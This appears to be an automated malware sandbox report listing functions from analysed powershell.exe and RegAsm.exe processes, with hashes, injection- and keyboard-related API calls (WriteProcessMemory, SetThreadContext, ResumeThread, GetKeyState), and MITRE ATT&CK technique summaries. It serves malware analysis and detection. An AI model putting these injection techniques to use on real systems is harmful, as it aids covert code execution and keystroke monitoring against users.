Opcode Fuzzy Hash: ddbe471af3a5402bb958ed80650c60a7a2bd883d4e41f2020bcaede37f6e1fbb
Instruction Fuzzy Hash: CB11E0B6800249CFDB10CF99C985BEEBBF8FB48314F20885AD958A7340C378A544CFA1

Function 00BCD5E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983403402.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bcd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bbb3bc6a42e1bc7ea14b600702d5a85c64dc613a94f050835df64b17c3e0af0
Instruction ID: 0776e7fd9bb51a439670a155e8b41e0b55f7f1cafb780b1e131642ac1e399f86
Opcode Fuzzy Hash: 3bbb3bc6a42e1bc7ea14b600702d5a85c64dc613a94f050835df64b17c3e0af0
Instruction Fuzzy Hash: 302121B9504240DFCB05DF14C9C0F26BFA5EB98314F2085BDD8090B256C33AD846DBA2

Function 00BDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78850c5a953ba5a5baf99c77b1f91f090e3c3c80570d2ad62e05b2976a8a8e44
Instruction ID: 43dbbb4c7db7ae5244466d544113edf432d1ce28506d20cbf9087833fc1ecd00
Opcode Fuzzy Hash: 78850c5a953ba5a5baf99c77b1f91f090e3c3c80570d2ad62e05b2976a8a8e44
Instruction Fuzzy Hash: 3A210071604200DFCB14DF24D9D0B26FBA5EB88314F24C5AAD8894B356D33AD806CAA1

Function 00BDD2B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c230ad6c851619e171b823cb1b90c3a8bacb4b79963fdaecdcee92662bd6eed
Instruction ID: 8955ce30842ee8a3e616034d625324f13ec060bf030c72898a4520b929e92983
Opcode Fuzzy Hash: 5c230ad6c851619e171b823cb1b90c3a8bacb4b79963fdaecdcee92662bd6eed
Instruction Fuzzy Hash: 38210475604604DFCB04CF24D9C0B26FBA5FB84324F24C9AED8894B352D33AD846CA66

Function 00BDD104 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad11c80620dcdbe1f7bfc16377a61aa3affeab1ae3e08e91aa6c5fc096f0dba
Instruction ID: 2d1a58319c1de650c903bb3575fba887444aa5610a9b951e1ceefebd83974ee9
Opcode Fuzzy Hash: 0ad11c80620dcdbe1f7bfc16377a61aa3affeab1ae3e08e91aa6c5fc096f0dba
Instruction Fuzzy Hash: D2213871504244EFDB05DF14D9C0B26FFA5FB84324F24C5AAD9896B345D33AD846C7A1

Function 00BDD005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9734bb6e7b903406f64cecf58d82b5c51c4d3a3f9a7ec63a1a2e687b996ccc5
Instruction ID: 622e19ef6e8bc96def98cf70c5a1910d2e5e00ca608f41fcbb226519a4e08071
Opcode Fuzzy Hash: e9734bb6e7b903406f64cecf58d82b5c51c4d3a3f9a7ec63a1a2e687b996ccc5
Instruction Fuzzy Hash: 6F2180755093808FCB12CF24D9A4715BFB1EB86314F28C5DBD8898B657C33A980ACB62

Function 00BCD5DB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983403402.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bcd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
Instruction ID: 3c25472f38d8be2d9b2eb7823883bfc07ebfdf825e98dc5f27bb8e63285f6200
Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
Instruction Fuzzy Hash: 4F11AF76504280DFCB16CF10D9C4B16BFA1FB94324F24C6ADD9094B616C336D85ADBA2

Function 00BDD0FF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a385c70c6df2fea437dd9638ab4733651be955a019863ca77dc41e91d8421b4c
Instruction ID: 48c28ff992bdc6741b224affb219157753366f4faae54d0d6230487af0ee950c
Opcode Fuzzy Hash: a385c70c6df2fea437dd9638ab4733651be955a019863ca77dc41e91d8421b4c
Instruction Fuzzy Hash: 2111B275504284CFDB12CF14D9C4B15FFA1FB84324F24C6AAD8495B746C33AD84ACBA2

Function 00BDD2AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2983796830.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_bdd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
Instruction ID: ad0cdc51d4950015be1274afc1573bbcea60ba7ff83a1d22b95fda1ba0358ce3
Opcode Fuzzy Hash: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
Instruction Fuzzy Hash: BD119D75504680DFDB06CF14D5C4B15FFA1FB84328F28C6AAD8894B756C33AD84ACBA2

Non-executed Functions

Function 00D25F1F Relevance: 4.6, APIs: 3, Instructions: 87keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00D25F8C
GetKeyState.USER32(00000011), ref: 00D25FD1
GetKeyState.USER32(00000012), ref: 00D26016

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 64c749c31f604b00b516506d0702184da27c3fc0cef34b742798e12699c0f954
Instruction ID: ce3585720b3771b07590e19ccdeb0509f687c36e9b26ce1b828ab91a8516b937
Opcode Fuzzy Hash: 64c749c31f604b00b516506d0702184da27c3fc0cef34b742798e12699c0f954
Instruction Fuzzy Hash: BA31C0B08057598EDB20CF99E5487EEBFF4EF54308F208049D648A7251C3B99685CFE1

Function 00D25F30 Relevance: 4.6, APIs: 3, Instructions: 79keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00D25F8C
GetKeyState.USER32(00000011), ref: 00D25FD1
GetKeyState.USER32(00000012), ref: 00D26016

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: fa76b5ec5107e73058fafeb227ee0483ee8aaef54601cbdd26b724eb2b4c7616
Instruction ID: 6dbe73b0473c7dae049a35252d93c1103155a63b91f2bd6181d6018cd2294047
Opcode Fuzzy Hash: fa76b5ec5107e73058fafeb227ee0483ee8aaef54601cbdd26b724eb2b4c7616
Instruction Fuzzy Hash: 66319C708047598EDB20DF9AE908BEFBFF4EF54708F208459D648A7350C7B99684CBA1

Analysis Process: powershell.exePID: 7428, Parent PID: 7368COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF848C50CFA Relevance: 2.3, APIs: 1, Instructions: 806
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a16d01710524f82584f8a0419b9dc9a4239e298c3199a67a2ecea9af9f40fe2
Instruction ID: c99c9580d4525a762501360e68d86d328fa9a1d21c5f5f14ddde2b2a249ed98f
Opcode Fuzzy Hash: 1a16d01710524f82584f8a0419b9dc9a4239e298c3199a67a2ecea9af9f40fe2
Instruction Fuzzy Hash: 37D1A530518A8D8FDFA8EF18D8567E977E1FB68310F10422AD84DC7291DF74A9818B86

Function 00007FF848C567E4 Relevance: 1.7, APIs: 1, Instructions: 154
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FF848C568D5

Memory Dump Source

Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e8b31f45fa402ac60513a81d9105973331244b8cf077258fb2f6556e6cbfc8ca
Instruction ID: 44c1ca9ffdecc030d7cbc33e1064fccc6eee3fcece877ac72f78d6d15cd3fe4b
Opcode Fuzzy Hash: e8b31f45fa402ac60513a81d9105973331244b8cf077258fb2f6556e6cbfc8ca
Instruction Fuzzy Hash: 61411731D0CB1C4FDB18EB9898466FDBBE0EB95350F00426FE449D3252DB74A845C795

Function 00007FF848C565D8 Relevance: 1.6, APIs: 1, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FF848C56694

Memory Dump Source

Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5fb8c73fa8ea718e29739a2ba1d4c5333fd6cbe813dc8f8c54c5ced98c35a7b4
Instruction ID: 24e329dc39886240ee5a888085ddc9d5eab7cae03c640c7ba2963b9828ff7bc0
Opcode Fuzzy Hash: 5fb8c73fa8ea718e29739a2ba1d4c5333fd6cbe813dc8f8c54c5ced98c35a7b4
Instruction Fuzzy Hash: AE312A31D0CB584FDB28EBA898466F9BBE0EF55361F04023FD04AD3282DF7564068795

Function 00007FF848C564DD Relevance: 1.6, APIs: 1, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF848C56597

Memory Dump Source

Source File: 00000012.00000002.2679255921.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848c50000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9b76f1e1d85a9545c16f4d9ca58307321b8c16c0808babfef98f30685bdfc500
Instruction ID: 0d62ba015294f990c42aaa81d83d3bfbac9b6819d7cdfb8171aafab81fed317c
Opcode Fuzzy Hash: 9b76f1e1d85a9545c16f4d9ca58307321b8c16c0808babfef98f30685bdfc500
Instruction Fuzzy Hash: 3931393090D7884FDB5ADB6888566E9BFE0EF56320F0842AFD089C7197DB789406C751

Function 00007FF848D20ADE Relevance: 1.4, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pH, xrefs: 00007FF848D20BC7

Memory Dump Source

Source File: 00000012.00000002.2685835997.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848d20000_powershell.jbxd

Similarity

API ID:
String ID: pH
API String ID: 0-1445135382
Opcode ID: 4585e3765e7df1aed8b2d457df181fa2646c0f4e8e033eaaa80be5a0d6705560
Instruction ID: f3850035eb24bbf6f1953f336efe8383028aa8ae29b787ccef37b6bfa94d0373
Opcode Fuzzy Hash: 4585e3765e7df1aed8b2d457df181fa2646c0f4e8e033eaaa80be5a0d6705560
Instruction Fuzzy Hash: 4D411422F0EE5A4FEBB9B62824553B5B3D1EF447A5F4800BAD44EC3186DF0CAC098795

Function 00007FF848D215C1 Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.2685835997.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848d20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a6d946f3ebf45264657777162fe075b2cdf422cb20a5809adf17323ec7ff7b9
Instruction ID: ce2ce7b7a0031ab9ccc289412c37b1911292574cdcfbedb76352beb15f647af3
Opcode Fuzzy Hash: 0a6d946f3ebf45264657777162fe075b2cdf422cb20a5809adf17323ec7ff7b9
Instruction Fuzzy Hash: 87110B31B0DB444FEF59AA2C64052B9B7E1FF8A225F0841BFD04AC3452DB19A80A8245

Analysis Process: RegAsm.exePID: 7544, Parent PID: 7428COMMON

Executed Functions

Function 01772959 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

daq, xrefs: 017729C2

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: 882cd84aa59c620e1d56d820be879a8d52bc5b6b8c0ce20f5a647dcd53f74240
Instruction ID: 2adbf19c0a1cad9a970a4a01428ff156f8e579063c7d1fee93fe97881972b31a
Opcode Fuzzy Hash: 882cd84aa59c620e1d56d820be879a8d52bc5b6b8c0ce20f5a647dcd53f74240
Instruction Fuzzy Hash: 84512730B002059FCB29EB79C61466EB6E6FF89300F048469D526EB3A5DF399D42CB95

Function 01772968 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

daq, xrefs: 017729C2

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: 9d08704daaf02480d941a71adf8c2ffb0815ffd52be5177e1d5ec8a9a86ec760
Instruction ID: e2739409b5f53afdf14c982ec61aaa9b59a891f076a67ef325efccc9f061282a
Opcode Fuzzy Hash: 9d08704daaf02480d941a71adf8c2ffb0815ffd52be5177e1d5ec8a9a86ec760
Instruction Fuzzy Hash: 6151C630B002059FCB29EB79C65466EBAE6FF89300F048469D516AB3A5DF399D41CB91

Function 017729AE Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

daq, xrefs: 017729C2

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: de20353cb4367674a9605bfab37ad86959b95f610083272bdaa6ae9950e49115
Instruction ID: 84ebf492316065d4b3a63d4571d1705f01cf660c43c5132c71d9e93e586ca0a7
Opcode Fuzzy Hash: de20353cb4367674a9605bfab37ad86959b95f610083272bdaa6ae9950e49115
Instruction Fuzzy Hash: 5A41C330B002058FCB29EB79C55466DBAE6FF88300F148469D51AEB3A9DF399D42CB91

Function 01770857 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0177092D

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 287e987bd6f7427f6d1a745f3692efea722e7ed20d90c15d20d40986d3a5a85d
Instruction ID: 9581f89f4c15aa393ee69122de84b41073735363bd309f3fd2c2c2833c55d303
Opcode Fuzzy Hash: 287e987bd6f7427f6d1a745f3692efea722e7ed20d90c15d20d40986d3a5a85d
Instruction Fuzzy Hash: B231107090024AAFCB15DF7AFB4194EBBB5FF49300B008569D418D7229E73D9D9ACB81

Function 01770868 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0177092D

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: f8c880656ab5f7f2c718ce6d6a6aa90fbaa8ddc889dcb2b8211f0f3a44156bd0
Instruction ID: 2bb1650ee92728a6fb684525b4d8c7b88e6c8908fe33172121de3ccc4adc194b
Opcode Fuzzy Hash: f8c880656ab5f7f2c718ce6d6a6aa90fbaa8ddc889dcb2b8211f0f3a44156bd0
Instruction Fuzzy Hash: C221C270A0020AAFCB19DF7AF74594DBBA5FF88300B108569D418D7229EB7D5D9ACF81

Function 017721B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c609071dda3dfa0ef7be9670ef0021ec9706e01bdd55f8b893741538c4660090
Instruction ID: 66e612d4a9481fea461a1e863f2aaa360ae61369b522674c53f3ca1f578d1649
Opcode Fuzzy Hash: c609071dda3dfa0ef7be9670ef0021ec9706e01bdd55f8b893741538c4660090
Instruction Fuzzy Hash: 0931BE313002095FDB19AB7AE55892E37E7FFC8650B114169E906DB3A4EF39DC02CB92

Function 017721A3 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123775779c6620d83f4be1b6bdc9f01d030d21a8a4feb0c82a5333bd17e8c212
Instruction ID: ae3116c7f5b1654a1ba525c7ba1681ecdecb0276f4399f32d14ff99d0811a156
Opcode Fuzzy Hash: 123775779c6620d83f4be1b6bdc9f01d030d21a8a4feb0c82a5333bd17e8c212
Instruction Fuzzy Hash: 8A2142303001096FDB19EB7AE808A2E3BE3FB85600F014129DA16DB365DE38DC01CB92

Function 01770841 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfeceba34358bd4df07e960c43a7cc73e0f701eb2cebf5da15c7e8b7a0b22ed7
Instruction ID: 89d95b6675cc49564015de58d89ad6670011e18fd9d44dd782f147fd85373404
Opcode Fuzzy Hash: dfeceba34358bd4df07e960c43a7cc73e0f701eb2cebf5da15c7e8b7a0b22ed7
Instruction Fuzzy Hash: ADC04C7508D3829FC3634AE15C259D63EECBA4213435B00DA9048DB562C1AC8CC2C773

Analysis Process: RegAsm.exePID: 7788, Parent PID: 7656COMMON

Executed Functions

Function 00FF2959 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

daq, xrefs: 00FF29C2

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: 65230cd1adf4332eed7cbca2a9a9cbfac6d4423547d129cf8d420e80e8cda0a6
Instruction ID: cdec584348caaab45af929dfaeccecf65953fd4ecb5191015b6fb186b0bfe64d
Opcode Fuzzy Hash: 65230cd1adf4332eed7cbca2a9a9cbfac6d4423547d129cf8d420e80e8cda0a6
Instruction Fuzzy Hash: 2951C530A002088FCB19EB79C55867D7BE6FF84308F108429D50AAB3B5DE39DD06DBA1

Function 00FF2968 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

daq, xrefs: 00FF29C2

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: 6b9ecb1cd7a1173d8fc3065d3b88f8ad3b35f7692b8c949aeaca432ac8fccc45
Instruction ID: 6ed8e770d4d702f8cfb960613fb6973500b5da276f6096bb79b9a56f1c3d85d1
Opcode Fuzzy Hash: 6b9ecb1cd7a1173d8fc3065d3b88f8ad3b35f7692b8c949aeaca432ac8fccc45
Instruction Fuzzy Hash: 3451B530A002098FCB59EB79D55867D76E6FF88308F108429D50AAB3B4DE39DD05DBA1

Function 00FF29AE Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

daq, xrefs: 00FF29C2

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: daq
API String ID: 0-1532007458
Opcode ID: 31efffa98df7c9ddc94482b4b7da461c6c8e9dd547b50e7312a7057dcd14f6ea
Instruction ID: a9ca2d9cd47af2d62814f9c1695f7232874ece9d943d9cd9ef86b08482530ed6
Opcode Fuzzy Hash: 31efffa98df7c9ddc94482b4b7da461c6c8e9dd547b50e7312a7057dcd14f6ea
Instruction Fuzzy Hash: A9419130B002098FDB59EF79D55867D76E6FF88308B108829D50AEB7B4DE39DD029B51

Function 00FF0857 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

Te]q, xrefs: 00FF092D

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: ed9da625b995ff1f454588fb21e457d71d662c0f9db9e0cb216656c0576ac56d
Instruction ID: dcf9129fddb8a286ef22c0f6a30a767fbf75413e730d4f040b653bc8bc9d4953
Opcode Fuzzy Hash: ed9da625b995ff1f454588fb21e457d71d662c0f9db9e0cb216656c0576ac56d
Instruction Fuzzy Hash: B23145349442459FCB06EFB9EA599597FF5EF9530CB00C5AAC0089B63EDB749A0ACB40

Function 00FF0841 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

Te]q, xrefs: 00FF092D

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 32dc3fa8c390135f6ca21c601c22a1ed003e9616623ec7412f21e1ac3c52633b
Instruction ID: f031c047ce13ef3da6780cc764776ca9bb6db5225126bd9e3a344864f5a2d4ff
Opcode Fuzzy Hash: 32dc3fa8c390135f6ca21c601c22a1ed003e9616623ec7412f21e1ac3c52633b
Instruction Fuzzy Hash: 723152749002458FCB06EFB9FA599597BF5FF9430CB00856AC4089B63EEB749A0ACB40

Function 00FF0868 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

Te]q, xrefs: 00FF092D

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 815073b0f20688b741bdd16d93baea046faed3751b358d892aaf253d2835d1e4
Instruction ID: 2441f5b1afb841f0eacb37a2574ad887fae067f7ceb45fd5578f4e381da4378e
Opcode Fuzzy Hash: 815073b0f20688b741bdd16d93baea046faed3751b358d892aaf253d2835d1e4
Instruction Fuzzy Hash: A421EF749402059FCB09EFA9FB499597BE5EF9430CB108565D0089B63DEB749A0ACB80

Function 00FF21A1 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bb6c7f10b65eb1cadae594e4bd82fd36dd97beb226837fad694da9e7479960
Instruction ID: 7b6698c5e308f62802b53f5f24bfc1e3eb6a0a573e3de59753865b6477776c4f
Opcode Fuzzy Hash: c7bb6c7f10b65eb1cadae594e4bd82fd36dd97beb226837fad694da9e7479960
Instruction Fuzzy Hash: 3E31D0357002054FDB09AB7CE55497E3BE2FFC9718B1541A8E50ACB3A5EE24DD06CBA1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
